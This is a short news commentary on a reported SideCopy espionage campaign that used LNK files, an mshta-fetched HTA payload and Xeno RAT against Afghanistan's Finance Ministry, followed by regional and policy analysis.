Pakistan Spies on Afghan Finance Ministry With Xeno RAT

The recent SideCopy operation illustrates a textbook APT playbook, yet its execution is unusually precise for a mid‑tier threat. By embedding malicious LNK files in seemingly innocuous PDFs, the group leveraged the mshta utility to fetch an HTA payload that loads the Xeno RAT in memory. Persistence is achieved through registry modifications that masquerade as a legitimate Microsoft Edge process, allowing the actors to maintain long‑term access to the Finance Ministry’s network while evading basic endpoint defenses.

Afghanistan’s digital footprint, built largely on foreign aid and post‑2001 infrastructure, now supports a sprawling array of ministry portals, email systems, and administrative services. However, the Taliban’s limited cybersecurity budget and talent pool leave critical systems exposed. The use of a compromised domain within the Ministry of Communication’s IP space demonstrates how attackers can piggyback on sovereign infrastructure to blend malicious traffic with legitimate government communications, complicating detection for a nation already struggling with isolation and scarce international cyber partnerships.

Regionally, the campaign signals a sharpening of cyber rivalry between Pakistan and Afghanistan, where financial intelligence is a high‑value target. For policymakers, the incident underscores the urgency of bolstering cyber hygiene, establishing robust threat‑sharing mechanisms, and investing in skilled cybersecurity personnel. As neighboring states continue to weaponize open‑source tools like Xeno RAT, Afghanistan’s ability to safeguard fiscal data will hinge on coordinated international assistance and a strategic overhaul of its cyber defense architecture.